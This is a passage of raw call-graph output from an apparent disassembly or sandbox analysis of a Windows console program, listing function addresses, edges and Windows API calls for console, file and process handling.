19006->19166 19009 7ff744f0bfbb 19007->19009 19009->18991 19011 7ff744f0bfc7 19009->19011 19013 7ff744f1081c 166 API calls 19011->19013 19012 7ff744f0bf75 19014 7ff744f0b0d8 194 API calls 19012->19014 19013->19012 19015 7ff744f0bf7f 19014->19015 19015->18991 19218 7ff744f15ad8 19015->19218 19020 7ff744f06e6d 19018->19020 19019 7ff744f06eb9 19019->18938 19020->19019 19021 7ff744f15cb4 7 API calls 19020->19021 19021->19020 19024 7ff744f0c675 19022->19024 19029 7ff744f0ca2f 19022->19029 19023 7ff744f1c5fc GetLastError 19023->19029 19025 7ff744f0ca40 17 API calls 19024->19025 19036 7ff744f0c69b 19025->19036 19026 7ff744f03278 166 API calls 19026->19029 19027 7ff744f1855c ??_V@YAXPEAX 19027->19029 19028 7ff744f1291c 8 API calls 19035 7ff744f0c94a 19028->19035 19029->19023 19029->19026 19029->19027 19030 7ff744f0c9b5 19032 7ff744f1855c ??_V@YAXPEAX 19030->19032 19031 7ff744f1855c ??_V@YAXPEAX 19059 7ff744f0c762 19031->19059 19034 7ff744f0c862 19032->19034 19033 7ff744f0c978 towupper 19033->19035 19040 7ff744f0c872 19034->19040 19043 7ff744f1c6b8 SetConsoleTitleW 19034->19043 19035->19023 19035->19028 19035->19029 19035->19030 19035->19033 19035->19035 19038 7ff744f2ec14 173 API calls 19035->19038 19057 7ff744f1c684 19035->19057 19035->19059 19062 7ff744f089c0 23 API calls 19035->19062 19064 7ff744f0ca16 GetLastError 19035->19064 19036->19029 19036->19030 19036->19035 19037 7ff744f0d3f0 223 API calls 19036->19037 19036->19059 19039 7ff744f0c741 19037->19039 19038->19059 19041 7ff744f0c74d 19039->19041 19045 7ff744f0c8b5 wcsncmp 19039->19045 19042 7ff744f1855c ??_V@YAXPEAX 19040->19042 19046 7ff744f0bd38 207 API calls 19041->19046 19041->19059 19044 7ff744f0c87c 19042->19044 19043->19040 19047 7ff744f18f80 7 API calls 19044->19047 19045->19041 19045->19059 19046->19059 19049 7ff744f0c88e 19047->19049 19048 7ff744f0c83d 19253 7ff744f0cb40 19048->19253 19049->18998 19051 7ff744f0c78a wcschr 19051->19059 19053 7ff744f0c855 19257 7ff744f07a70 19053->19257 19054 7ff744f0ca25 19056 7ff744f03278 166 API calls 19054->19056 19056->19029 19058 7ff744f03278 166 API calls 19057->19058 19060 7ff744f1c675 19058->19060 19059->19029 19059->19031 19059->19035 19059->19048 19059->19051 19059->19054 19061 7ff744f0ca2a 19059->19061 19060->19029 19063 7ff744f19158 7 API calls 19061->19063 19062->19035 19063->19029 19066 7ff744f03278 166 API calls 19064->19066 19066->19060 19069 7ff744f0c0c4 19068->19069 19070 7ff744f0c01c 19068->19070 19069->18985 19071 7ff744f0c022 19070->19071 19072 7ff744f0c086 19070->19072 19073 7ff744f0c030 19071->19073 19074 7ff744f0c113 19071->19074 19075 7ff744f0c144 19072->19075 19088 7ff744f0c094 19072->19088 19076 7ff744f0c039 wcschr 19073->19076 19086 7ff744f0c053 19073->19086 19081 7ff744f0ff70 2 API calls 19074->19081 19074->19086 19077 7ff744f0c151 19075->19077 19094 7ff744f0c1c8 19075->19094 19078 7ff744f0c301 19076->19078 19076->19086 19346 7ff744f0c460 19077->19346 19082 7ff744f0cd90 166 API calls 19078->19082 19079 7ff744f0c058 19090 7ff744f0ff70 2 API calls 19079->19090 19092 7ff744f0c073 19079->19092 19080 7ff744f0c0c6 19085 7ff744f0c0cf wcschr 19080->19085 19080->19092 19081->19086 19105 7ff744f0c30b 19082->19105 19084 7ff744f0c460 183 API calls 19084->19088 19089 7ff744f0c1be 19085->19089 19085->19092 19086->19079 19086->19080 19096 7ff744f0c211 19086->19096 19088->19069 19088->19084 19091 7ff744f0cd90 166 API calls 19089->19091 19090->19092 19091->19094 19092->19069 19093 7ff744f0c460 183 API calls 19092->19093 19093->19092 19094->19069 19094->19096 19097 7ff744f0c285 19094->19097 19101 7ff744f0d840 178 API calls 19094->19101 19095 7ff744f0c460 183 API calls 19095->19069 19099 7ff744f0ff70 2 API calls 19096->19099 19097->19096 19102 7ff744f0b6b0 170 API calls 19097->19102 19098 7ff744f0d840 178 API calls 19098->19105 19099->19069 19100 7ff744f0b6b0 170 API calls 19100->19086 19101->19094 19104 7ff744f0c2ac 19102->19104 19103 7ff744f0c3d4 19103->19092 19103->19096 19103->19100 19104->19092 19104->19096 19105->19069 19105->19096 19105->19098 19105->19103 19107 7ff744f0ca40 17 API calls 19106->19107 19123 7ff744f0b162 19107->19123 19108 7ff744f0b2e1 19109 7ff744f0b2f7 ??_V@YAXPEAX 19108->19109 19110 7ff744f0b303 19108->19110 19109->19110 19112 7ff744f18f80 7 API calls 19110->19112 19111 7ff744f0b1d9 19115 7ff744f0cd90 166 API calls 19111->19115 19131 7ff744f0b1ed 19111->19131 19114 7ff744f0b315 19112->19114 19113 7ff744f11ea0 8 API calls 19113->19123 19114->18989 19114->19000 19115->19131 19117 7ff744f1bfef _get_osfhandle SetFilePointer 19119 7ff744f1c01d 19117->19119 19117->19131 19118 7ff744f0b228 _get_osfhandle 19121 7ff744f0b23f _get_osfhandle 19118->19121 19118->19131 19122 7ff744f133f0 _vsnwprintf 19119->19122 19120 7ff744f0affc _dup 19120->19131 19121->19131 19125 7ff744f1c038 19122->19125 19123->19108 19123->19111 19123->19113 19123->19123 19124 7ff744f101b8 6 API calls 19124->19131 19130 7ff744f03278 166 API calls 19125->19130 19126 7ff744f1c1c3 19127 7ff744f133f0 _vsnwprintf 19126->19127 19127->19125 19128 7ff744f0d208 _close 19128->19131 19129 7ff744f126e0 19 API calls 19129->19131 19132 7ff744f1c1f9 19130->19132 19131->19108 19131->19117 19131->19118 19131->19120 19131->19124 19131->19126 19131->19128 19131->19129 19133 7ff744f1c060 19131->19133 19135 7ff744f0b038 _dup2 19131->19135 19136 7ff744f1c246 19131->19136 19137 7ff744f1c1a5 19131->19137 19142 7ff744f0b356 19131->19142 19360 7ff744f2f318 _get_osfhandle GetFileType 19131->19360 19134 7ff744f0af98 2 API calls 19132->19134 19133->19136 19140 7ff744f109f4 2 API calls 19133->19140 19134->19108 19135->19131 19138 7ff744f0af98 2 API calls 19136->19138 19139 7ff744f0b038 _dup2 19137->19139 19141 7ff744f1c24b 19138->19141 19143 7ff744f1c1b7 19139->19143 19144 7ff744f1c084 19140->19144 19145 7ff744f2f1d8 166 API calls 19141->19145 19150 7ff744f0af98 2 API calls 19142->19150 19146 7ff744f1c207 19143->19146 19147 7ff744f1c1be 19143->19147 19148 7ff744f0b900 166 API calls 19144->19148 19145->19108 19149 7ff744f0d208 _close 19146->19149 19151 7ff744f0d208 _close 19147->19151 19152 7ff744f1c08c 19148->19152 19149->19142 19154 7ff744f1c211 19150->19154 19151->19126 19153 7ff744f1c094 wcsrchr 19152->19153 19165 7ff744f1c0ad 19152->19165 19153->19165 19155 7ff744f133f0 _vsnwprintf 19154->19155 19156 7ff744f1c22c 19155->19156 19157 7ff744f03278 166 API calls 19156->19157 19157->19108 19158 7ff744f1c106 19159 7ff744f0ff70 2 API calls 19158->19159 19161 7ff744f1c13b 19159->19161 19160 7ff744f1c0e0 _wcsnicmp 19160->19165 19161->19136 19162 7ff744f1c146 SearchPathW 19161->19162 19162->19136 19163 7ff744f1c188 19162->19163 19164 7ff744f126e0 19 API calls 19163->19164 19164->19137 19165->19158 19165->19160 19167 7ff744f11ea0 8 API calls 19166->19167 19168 7ff744f10ab9 19167->19168 19169 7ff744f10b12 memset 19168->19169 19170 7ff744f1d927 19168->19170 19171 7ff744f10aee _wcsnicmp 19168->19171 19173 7ff744f1128f ??_V@YAXPEAX 19168->19173 19172 7ff744f0ca40 17 API calls 19169->19172 19175 7ff744f1081c 166 API calls 19170->19175 19171->19169 19171->19170 19174 7ff744f10b5a 19172->19174 19177 7ff744f0b364 17 API calls 19174->19177 19188 7ff744f1d94e 19174->19188 19176 7ff744f1d933 19175->19176 19176->19169 19176->19173 19178 7ff744f10b6f 19177->19178 19178->19173 19180 7ff744f10b8c wcschr 19178->19180 19184 7ff744f10c0f wcsrchr 19178->19184 19178->19188 19191 7ff744f0cd90 166 API calls 19178->19191 19192 7ff744f13060 171 API calls 19178->19192 19193 7ff744f1081c 166 API calls 19178->19193 19194 7ff744f0d3f0 223 API calls 19178->19194 19195 7ff744f11ea0 8 API calls 19178->19195 19196 7ff744f0af74 170 API calls 19178->19196 19197 7ff744f10d71 wcsrchr 19178->19197 19199 7ff744f1291c 8 API calls 19178->19199 19200 7ff744f10fb1 wcsrchr 19178->19200 19201 7ff744f10fd0 wcschr 19178->19201 19202 7ff744f12eb4 22 API calls 19178->19202 19205 7ff744f110fd wcsrchr 19178->19205 19214 7ff744f11087 _wcsicmp 19178->19214 19217 7ff744f1da74 19178->19217 19361 7ff744f13bac 19178->19361 19365 7ff744f12efc 19178->19365 19179 7ff744f1d96b ??_V@YAXPEAX 19179->19188 19180->19178 19183 7ff744f1d99a wcschr 19183->19188 19184->19178 19184->19188 19185 7ff744f1d9ca GetFileAttributesW 19186 7ff744f1da64 19185->19186 19185->19188 19187 7ff744f1da90 GetFileAttributesW 19187->19188 19189 7ff744f1daa8 GetLastError 19187->19189 19188->19179 19188->19183 19188->19185 19188->19186 19190 7ff744f1d9fd ??_V@YAXPEAX 19188->19190 19189->19186 19189->19188 19190->19188 19191->19178 19192->19178 19193->19178 19194->19178 19195->19178 19196->19178 19197->19178 19198 7ff744f10d97 NeedCurrentDirectoryForExePathW 19197->19198 19198->19178 19198->19188 19199->19178 19200->19178 19200->19201 19201->19186 19203 7ff744f10fed wcschr 19201->19203 19202->19178 19203->19178 19203->19186 19205->19178 19206 7ff744f1111a _wcsicmp 19205->19206 19207 7ff744f11138 _wcsicmp 19206->19207 19208 7ff744f1123d 19206->19208 19207->19208 19209 7ff744f110c5 19207->19209 19210 7ff744f11175 19208->19210 19211 7ff744f11250 ??_V@YAXPEAX 19208->19211 19209->19210 19212 7ff744f11169 ??_V@YAXPEAX 19209->19212 19213 7ff744f18f80 7 API calls 19210->19213 19211->19210 19212->19210 19215 7ff744f0bf70 19213->19215 19216 7ff744f110a7 _wcsicmp 19214->19216 19214->19217 19215->18999 19215->19012 19216->19209 19216->19217 19217->19186 19217->19187 19219 7ff744f0cd90 166 API calls 19218->19219 19220 7ff744f15b12 19219->19220 19221 7ff744f0cb40 166 API calls 19220->19221 19246 7ff744f15b8b 19220->19246 19223 7ff744f15b26 19221->19223 19222 7ff744f18f80 7 API calls 19224 7ff744f0bf99 19222->19224 19225 7ff744f10a6c 273 API calls 19223->19225 19223->19246 19224->18998 19226 7ff744f15b43 19225->19226 19227 7ff744f15bb8 19226->19227 19228 7ff744f15b48 GetConsoleTitleW 19226->19228 19230 7ff744f15bbd GetConsoleTitleW 19227->19230 19231 7ff744f15bf4 19227->19231 19229 7ff744f0cad4 172 API calls 19228->19229 19232 7ff744f15b66 19229->19232 19235 7ff744f0cad4 172 API calls 19230->19235 19233 7ff744f15bfd 19231->19233 19234 7ff744f1f452 19231->19234 19379 7ff744f14224 InitializeProcThreadAttributeList 19232->19379 19240 7ff744f15c1b 19233->19240 19241 7ff744f1f462 19233->19241 19233->19246 19237 7ff744f13c24 166 API calls 19234->19237 19238 7ff744f15bdb 19235->19238 19237->19246 19440 7ff744f096e8 19238->19440 19243 7ff744f03278 166 API calls 19240->19243 19244 7ff744f03278 166 API calls 19241->19244 19243->19246 19244->19246 19246->19222 19249 7ff744f07211 _setjmp 19247->19249 19252 7ff744f07279 19247->19252 19250 7ff744f07265 19249->19250 19249->19252 19776 7ff744f072b0 19250->19776 19252->19003 19254 7ff744f0cb63 19253->19254 19255 7ff744f0cd90 166 API calls 19254->19255 19256 7ff744f0c848 19255->19256 19256->19053 19260 7ff744f0cad4 19256->19260 19272 7ff744f07d30 memset 19257->19272 19259 7ff744f07a8a 19259->19034 19261 7ff744f0cad9 19260->19261 19262 7ff744f0cb05 19260->19262 19261->19262 19263 7ff744f0cd90 166 API calls 19261->19263 19262->19053 19264 7ff744f1c722 19263->19264 19264->19262 19265 7ff744f1c72e GetConsoleTitleW 19264->19265 19265->19262 19266 7ff744f1c74a 19265->19266 19267 7ff744f0b6b0 170 API calls 19266->19267 19271 7ff744f1c778 19267->19271 19268 7ff744f1c7ec 19269 7ff744f0ff70 2 API calls 19268->19269 19269->19262 19270 7ff744f1c7dd SetConsoleTitleW 19270->19268 19271->19268 19271->19270 19273 7ff744f0ca40 17 API calls 19272->19273 19274 7ff744f07dc3 19273->19274 19275 7ff744f1417c 166 API calls 19274->19275 19287 7ff744f1af72 19274->19287 19276 7ff744f07dee 19275->19276 19278 7ff744f0d3f0 223 API calls 19276->19278 19277 7ff744f03278 166 API calls 19279 7ff744f1af91 19277->19279 19280 7ff744f07dfb 19278->19280 19279->19259 19281 7ff744f1af7e 19280->19281 19282 7ff744f07e09 19280->19282 19283 7ff744f1af89 19281->19283 19281->19287 19282->19279 19285 7ff744f11ea0 8 API calls 19282->19285 19286 7ff744f0b900 166 API calls 19282->19286 19282->19287 19291 7ff744f07ea4 19282->19291 19295 7ff744f1b024 19282->19295 19305 7ff744f07ef1 19282->19305 19308 7ff744f07aa0 19282->19308 19284 7ff744f11ea0 8 API calls 19283->19284 19284->19279 19285->19282 19286->19282 19287->19277 19288 7ff744f1823c 10 API calls 19288->19305 19289 7ff744f1afae 19292 7ff744f1b03f 19289->19292 19300 7ff744f1afce 19289->19300 19290 7ff744f08b20 231 API calls 19290->19305 19293 7ff744f07ec3 19291->19293 19294 7ff744f07eb7 ??_V@YAXPEAX 19291->19294 19292->19287 19297 7ff744f18f80 7 API calls 19293->19297 19294->19293 19298 7ff744f03278 166 API calls 19295->19298 19296 7ff744f0b364 17 API calls 19296->19305 19299 7ff744f07ed5 19297->19299 19298->19279 19299->19259 19300->19279 19301 7ff744f1aff6 19300->19301 19302 7ff744f03278 166 API calls 19300->19302 19301->19279 19302->19301 19303 7ff744f08940 17 API calls 19303->19305 19304 7ff744f18a70 2 API calls 19304->19305 19305->19279 19305->19282 19305->19288 19305->19289 19305->19290 19305->19292 19305->19296 19305->19303 19305->19304 19306 7ff744f13a0c 2 API calls 19305->19306 19306->19305 19309 7ff744f07aeb memset 19308->19309 19310 7ff744f07adb 19308->19310 19312 7ff744f0ca40 17 API calls 19309->19312 19343 7ff744f1291c GetDriveTypeW 19310->19343 19314 7ff744f07b36 19312->19314 19316 7ff744f07b3e GetFullPathNameW 19314->19316 19332 7ff744f1ae4e 19314->19332 19315 7ff744f1ae3a 19317 7ff744f03278 166 API calls 19315->19317 19318 7ff744f07b73 19316->19318 19319 7ff744f1ae55 GetLastError 19316->19319 19320 7ff744f1ae44 19317->19320 19321 7ff744f1ae68 19318->19321 19322 7ff744f07b7e CreateDirectoryW 19318->19322 19319->19332 19324 7ff744f07bb5 19320->19324 19329 7ff744f03278 166 API calls 19321->19329 19325 7ff744f07b93 19322->19325 19326 7ff744f07bdf GetLastError 19322->19326 19323 7ff744f03278 166 API calls 19328 7ff744f1af6b 19323->19328 19327 7ff744f18f80 7 API calls 19324->19327 19325->19324 19330 7ff744f07ba9 free 19325->19330 19326->19321 19333 7ff744f07bf8 19326->19333 19331 7ff744f07bc6 19327->19331 19341 7ff744f1ae7e 19329->19341 19330->19324 19331->19282 19332->19323 19333->19332 19334 7ff744f07cd1 CreateDirectoryW 19333->19334 19337 7ff744f07c8f 19333->19337 19338 7ff744f07c52 CreateDirectoryW 19333->19338 19340 7ff744f07cca 19333->19340 19333->19341 19334->19325 19335 7ff744f07cf3 19334->19335 19336 7ff744f1af46 GetLastError 19335->19336 19336->19325 19336->19332 19337->19333 19337->19338 19338->19337 19339 7ff744f07c7b GetLastError 19338->19339 19339->19332 19339->19337 19340->19334 19341->19332 19341->19334 19342 7ff744f1af3d 19341->19342 19342->19336 19344 7ff744f18f80 7 API calls 19343->19344 19345 7ff744f07ae3 19344->19345 19345->19309 19345->19315 19347 7ff744f0c4c9 19346->19347 19348 7ff744f0c486 19346->19348 19351 7ff744f0ff70 2 API calls 19347->19351 19353 7ff744f0c161 19347->19353 19349 7ff744f0c48e wcschr 19348->19349 19348->19353 19350 7ff744f0c4ef 19349->19350 19349->19353 19352 7ff744f0cd90 166 API calls 19350->19352 19351->19353 19359 7ff744f0c4f9 19352->19359 19353->19069 19353->19095 19354 7ff744f0c5bd 19355 7ff744f0c541 19354->19355 19358 7ff744f0b6b0 170 API calls 19354->19358 19355->19353 19357 7ff744f0ff70 2 API calls 19355->19357 19356 7ff744f0d840 178 API calls 19356->19359 19357->19353 19358->19355 19359->19353 19359->19354 19359->19355 19359->19356 19360->19131 19362 7ff744f13bfe 19361->19362 19364 7ff744f13bcf 19361->19364 19362->19178 19363 7ff744f13bdc wcschr 19363->19362 19363->19364 19364->19362 19364->19363 19366 7ff744f12f97 19365->19366 19367 7ff744f12f2a 19365->19367 19366->19367 19368 7ff744f12f9c wcschr 19366->19368 19369 7ff744f1823c 10 API calls 19367->19369 19371 7ff744f12f5a 19368->19371 19372 7ff744f12fb6 wcschr 19368->19372 19370 7ff744f12f56 19369->19370 19370->19371 19373 7ff744f13a0c 2 API calls 19370->19373 19374 7ff744f18f80 7 API calls 19371->19374 19378 7ff744f1e4ec 19371->19378 19372->19367 19372->19371 19375 7ff744f12fe0 19373->19375 19376 7ff744f12f83 19374->19376 19375->19371 19377 7ff744f12fe9 wcsrchr 19375->19377 19376->19178 19377->19371 19380 7ff744f142ab UpdateProcThreadAttribute 19379->19380 19381 7ff744f1ecd4 GetLastError 19379->19381 19383 7ff744f142eb memset memset GetStartupInfoW 19380->19383 19384 7ff744f1ecf0 GetLastError 19380->19384 19382 7ff744f1ecee 19381->19382 19386 7ff744f13a90 170 API calls 19383->19386 19477 7ff744f29eec 19384->19477 19387 7ff744f143a8 19386->19387 19389 7ff744f0b900 166 API calls 19387->19389 19390 7ff744f143bb 19389->19390 19391 7ff744f14638 _local_unwind 19390->19391 19392 7ff744f143cc 19390->19392 19391->19392 19393 7ff744f143de wcsrchr 19392->19393 19394 7ff744f14415 19392->19394 19393->19394 19395 7ff744f143f7 lstrcmpW 19393->19395 19464 7ff744f15a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 19394->19464 19395->19394 19397 7ff744f14668 19395->19397 19465 7ff744f29044 19397->19465 19436 7ff744f15c3c 19437 7ff744f15c4e 19436->19437 19438 7ff744f15c45 19436->19438 19437->19246 19438->19437 19439 7ff744f1f470 SetConsoleTitleW 19438->19439 19439->19437 19457 7ff744f09737 19440->19457 19442 7ff744f0977d memset 19444 7ff744f0ca40 17 API calls 19442->19444 19443 7ff744f0cd90 166 API calls 19443->19457 19444->19457 19445 7ff744f1b76e 19447 7ff744f03278 166 API calls 19445->19447 19446 7ff744f1b7b3 19450 7ff744f1b787 19447->19450 19448 7ff744f1b79a 19449 7ff744f1855c ??_V@YAXPEAX 19448->19449 19449->19446 19452 7ff744f1b795 19450->19452 19567 7ff744f2e944 19450->19567 19451 7ff744f0b364 17 API calls 19451->19457 19575 7ff744f27694 19452->19575 19457->19442 19457->19443 19457->19445 19457->19446 19457->19448 19457->19451 19459 7ff744f0986d 19457->19459 19479 7ff744f11fac memset 19457->19479 19506 7ff744f0ce10 19457->19506 19556 7ff744f096b4 19457->19556 19561 7ff744f15920 19457->19561 19460 7ff744f0988c 19459->19460 19461 7ff744f09880 ??_V@YAXPEAX 19459->19461 19462 7ff744f18f80 7 API calls 19460->19462 19461->19460 19463 7ff744f0989d 19462->19463 19463->19436 19466 7ff744f13a90 170 API calls 19465->19466 19467 7ff744f29064 19466->19467 19468 7ff744f2906e 19467->19468 19471 7ff744f29083 19467->19471 19469 7ff744f1498c 8 API calls 19468->19469 19470 7ff744f29081 19469->19470 19470->19394 19472 7ff744f0cd90 166 API calls 19471->19472 19473 7ff744f2909b 19472->19473 19473->19470 19474 7ff744f1498c 8 API calls 19473->19474 19475 7ff744f290ec 19474->19475 19476 7ff744f0ff70 2 API calls 19475->19476 19476->19470 19478 7ff744f1ed0a DeleteProcThreadAttributeList 19477->19478 19478->19382 19480 7ff744f1203b 19479->19480 19481 7ff744f120b0 19480->19481 19482 7ff744f12094 19480->19482 19483 7ff744f13060 171 API calls 19481->19483 19485 7ff744f1211c 19481->19485 19484 7ff744f120a6 19482->19484 19486 7ff744f03278 166 API calls 19482->19486 19483->19485 19488 7ff744f18f80 7 API calls 19484->19488 19485->19484 19487 7ff744f12e44 2 API calls 19485->19487 19486->19484 19490 7ff744f12148 19487->19490 19489 7ff744f12325 19488->19489 19489->19457 19490->19484 19581 7ff744f12d70 19490->19581 19493 7ff744f0b900 166 API calls 19495 7ff744f121d0 19493->19495 19494 7ff744f1e04a ??_V@YAXPEAX 19494->19484 19495->19494 19496 7ff744f1221c wcsspn 19495->19496 19505 7ff744f122a4 ??_V@YAXPEAX 19495->19505 19498 7ff744f0b900 166 API calls 19496->19498 19499 7ff744f1223b 19498->19499 19499->19494 19503 7ff744f12252 19499->19503 19500 7ff744f1228f 19501 7ff744f0d3f0 223 API calls 19500->19501 19501->19505 19502 7ff744f1e06d wcschr 19502->19503 19503->19500 19503->19502 19504 7ff744f1e090 towupper 19503->19504 19504->19500 19504->19503 19505->19484 19507 7ff744f0d0f8 19506->19507 19537 7ff744f0ce5b 19506->19537 19509 7ff744f18f80 7 API calls 19507->19509 19508 7ff744f1c860 19510 7ff744f1c97c 19508->19510 19624 7ff744f2ee88 19508->19624 19511 7ff744f0d10a 19509->19511 19514 7ff744f2e9b4 197 API calls 19510->19514 19511->19457 19516 7ff744f1c981 longjmp 19514->19516 19519 7ff744f1c99a 19516->19519 19517 7ff744f1c95c 19517->19510 19522 7ff744f096b4 186 API calls 19517->19522 19518 7ff744f1c882 EnterCriticalSection LeaveCriticalSection 19524 7ff744f0d0e3 19518->19524 19519->19507 19521 7ff744f1c9b3 ??_V@YAXPEAX 19519->19521 19521->19507 19522->19517 19524->19457 19525 7ff744f0cd90 166 API calls 19525->19537 19526 7ff744f0d208 _close 19526->19537 19527 7ff744f1c9d5 19528 7ff744f2d610 167 API calls 19527->19528 19530 7ff744f1c9da 19528->19530 19529 7ff744f0b900 166 API calls 19529->19537 19531 7ff744f1ca07 19530->19531 19533 7ff744f2bfec 176 API calls 19530->19533 19532 7ff744f2e91c 198 API calls 19531->19532 19538 7ff744f1ca0c 19532->19538 19534 7ff744f1c9f1 19533->19534 19536 7ff744f03240 166 API calls 19534->19536 19535 7ff744f0cf33 memset 19535->19537 19536->19531 19537->19507 19537->19508 19537->19519 19537->19524 19537->19525 19537->19527 19537->19529 19537->19535 19539 7ff744f0ca40 17 API calls 19537->19539 19540 7ff744f2bfec 176 API calls 19537->19540 19541 7ff744f0d184 wcschr 19537->19541 19542 7ff744f1c9c9 19537->19542 19543 7ff744f0d1a7 wcschr 19537->19543 19546 7ff744f10a6c 273 API calls 19537->19546 19547 7ff744f0be00 647 API calls 19537->19547 19548 7ff744f13448 166 API calls 19537->19548 19549 7ff744f10580 12 API calls 19537->19549 19550 7ff744f0cfab _wcsicmp 19537->19550 19553 7ff744f11fac 238 API calls 19537->19553 19555 7ff744f0d044 ??_V@YAXPEAX 19537->19555 19591 7ff744f10494 19537->19591 19604 7ff744f0df60 19537->19604 19660 7ff744f2778c 19537->19660 19691 7ff744f2c738 19537->19691 19538->19457 19539->19537 19540->19537 19541->19537 19544 7ff744f1855c ??_V@YAXPEAX 19542->19544 19543->19537 19544->19507 19546->19537 19547->19537 19548->19537 19551 7ff744f0d003 GetConsoleOutputCP GetCPInfo 19549->19551 19550->19537 19552 7ff744f104f4 3 API calls 19551->19552 19552->19537 19553->19537 19555->19537 19557 7ff744f096c8 19556->19557 19558 7ff744f1b6e2 RevertToSelf CloseHandle 19556->19558 19559 7ff744f096ce 19557->19559 19560 7ff744f06a48 184 API calls 19557->19560 19559->19457 19560->19557 19562 7ff744f1596c 19561->19562 19566 7ff744f15a12 19561->19566 19563 7ff744f1598d VirtualQuery 19562->19563 19562->19566 19564 7ff744f159ad 19563->19564 19563->19566 19565 7ff744f159b7 VirtualQuery 19564->19565 19564->19566 19565->19564 19565->19566 19566->19457 19568 7ff744f2e990 19567->19568 19569 7ff744f2e954 19567->19569 19570 7ff744f2e9b4 197 API calls 19568->19570 19571 7ff744f2ee88 390 API calls 19569->19571 19572 7ff744f2e995 longjmp 19570->19572 19573 7ff744f2e964 19571->19573 19573->19568 19574 7ff744f096b4 186 API calls 19573->19574 19574->19573 19576 7ff744f276a3 19575->19576 19577 7ff744f276b7 19576->19577 19578 7ff744f096b4 186 API calls 19576->19578 19579 7ff744f2e9b4 197 API calls 19577->19579 19578->19576 19580 7ff744f276bc longjmp 19579->19580 19582 7ff744f12d89 19581->19582 19583 7ff744f12da3 19581->19583 19586 7ff744f121af 19582->19586 19587 7ff744f12e0c 19582->19587 19583->19582 19585 7ff744f12dbc GetProcessHeap RtlFreeHeap 19583->19585 19585->19582 19585->19583 19586->19493 19588 7ff744f12e32 19587->19588 19589 7ff744f12e11 19587->19589 19588->19582 19589->19588 19590 7ff744f1e494 VirtualFree 19589->19590 19593 7ff744f104a4 19591->19593 19592 7ff744f126e0 19 API calls 19592->19593 19593->19592 19594 7ff744f104b9 _get_osfhandle SetFilePointer 19593->19594 19595 7ff744f1d845 19593->19595 19597 7ff744f1d839 19593->19597 19600 7ff744f03278 166 API calls 19593->19600 19594->19537 19596 7ff744f2f1d8 166 API calls 19595->19596 19599 7ff744f1d837 19596->19599 19598 7ff744f03278 166 API calls 19597->19598 19598->19599 19601 7ff744f1d819 _getch 19600->19601 19601->19593 19602 7ff744f1d832 19601->19602 19701 7ff744f2bde4 EnterCriticalSection LeaveCriticalSection 19602->19701 19605 7ff744f0dfe2 19604->19605 19606 7ff744f0df93 19604->19606 19608 7ff744f0e100 VirtualFree 19605->19608 19609 7ff744f0e00b _setjmp 19605->19609 19606->19605 19607 7ff744f0df9f GetProcessHeap RtlFreeHeap 19606->19607 19607->19605 19607->19606 19608->19605 19610 7ff744f0e04a 19609->19610 19611 7ff744f0ceaa _tell 19609->19611 19612 7ff744f0e600 473 API calls 19610->19612 19611->19526 19613 7ff744f0e073 19612->19613 19614 7ff744f0e0e0 longjmp 19613->19614 19615 7ff744f0e081 19613->19615 19623 7ff744f0e0b0 19614->19623 19616 7ff744f0d250 475 API calls 19615->19616 19618 7ff744f0e086 19616->19618 19620 7ff744f0e600 473 API calls 19618->19620 19618->19623 19621 7ff744f0e0a7 19620->19621 19622 7ff744f2d610 167 API calls 19621->19622 19621->19623 19622->19623 19623->19611 19702 7ff744f2d3fc 19623->19702 19625 7ff744f2eefd 19624->19625 19626 7ff744f2eed1 19624->19626 19764 7ff744f1885c FormatMessageW 19625->19764 19750 7ff744f07420 19626->19750 19630 7ff744f101b8 6 API calls 19631 7ff744f2eee5 19630->19631 19634 7ff744f2eef8 19631->19634 19635 7ff744f2eeeb 19631->19635 19632 7ff744f2ef41 LocalFree GetStdHandle GetConsoleMode 19640 7ff744f2efe8 GetStdHandle GetConsoleMode 19632->19640 19641 7ff744f2efcf SetConsoleMode 19632->19641 19633 7ff744f2ef04 19633->19632 19639 7ff744f2ef2f _wcsupr 19633->19639 19636 7ff744f0d208 _close 19634->19636 19637 7ff744f0d208 _close 19635->19637 19636->19625 19656 7ff744f2eef0 19637->19656 19639->19632 19642 7ff744f2f015 SetConsoleMode 19640->19642 19646 7ff744f2f03c 19640->19646 19641->19640 19642->19646 19643 7ff744f18f80 7 API calls 19644 7ff744f1c879 19643->19644 19644->19517 19644->19518 19645 7ff744f03240 166 API calls 19645->19646 19646->19645 19647 7ff744f101b8 6 API calls 19646->19647 19648 7ff744f2f07e GetStdHandle FlushConsoleInputBuffer 19646->19648 19649 7ff744f2f0a0 GetStdHandle 19646->19649 19650 7ff744f2f12d wcschr 19646->19650 19652 7ff744f2f161 19646->19652 19653 7ff744f13448 166 API calls 19646->19653 19658 7ff744f2f0d7 towupper 19646->19658 19659 7ff744f13448 166 API calls 19646->19659 19647->19646 19648->19646 19651 7ff744f28450 367 API calls 19649->19651 19650->19646 19651->19646 19654 7ff744f2f17a 19652->19654 19655 7ff744f2f166 SetConsoleMode 19652->19655 19653->19650 19654->19656 19657 7ff744f2f17f SetConsoleMode 19654->19657 19655->19654 19656->19643 19657->19656 19658->19646 19659->19646 19668 7ff744f277bc 19660->19668 19661 7ff744f27aca 19664 7ff744f134a0 166 API calls 19661->19664 19662 7ff744f279c0 19670 7ff744f134a0 166 API calls 19662->19670 19666 7ff744f27adb 19664->19666 19665 7ff744f27ab5 19669 7ff744f13448 166 API calls 19665->19669 19672 7ff744f27af0 19666->19672 19675 7ff744f13448 166 API calls 19666->19675 19667 7ff744f27984 19667->19662 19673 7ff744f27989 19667->19673 19668->19661 19668->19662 19668->19665 19668->19667 19671 7ff744f27a00 19668->19671 19668->19673 19681 7ff744f13448 166 API calls 19668->19681 19682 7ff744f2778c 166 API calls 19668->19682 19684 7ff744f279ef 19668->19684 19669->19684 19674 7ff744f279d6 19670->19674 19677 7ff744f27a0b 19671->19677 19671->19684 19689 7ff744f27a33 19671->19689 19676 7ff744f2778c 166 API calls 19672->19676 19673->19684 19769 7ff744f276e0 19673->19769 19678 7ff744f13448 166 API calls 19674->19678 19690 7ff744f279e7 19674->19690 19675->19672 19680 7ff744f27afb 19676->19680 19677->19684 19685 7ff744f134a0 166 API calls 19677->19685 19678->19690 19680->19673 19686 7ff744f13448 166 API calls 19680->19686 19681->19668 19682->19668 19683 7ff744f13448 166 API calls 19683->19684 19684->19537 19687 7ff744f27a23 19685->19687 19686->19673 19688 7ff744f2778c 166 API calls 19687->19688 19688->19690 19689->19683 19765 7ff744f27730 19690->19765 19692 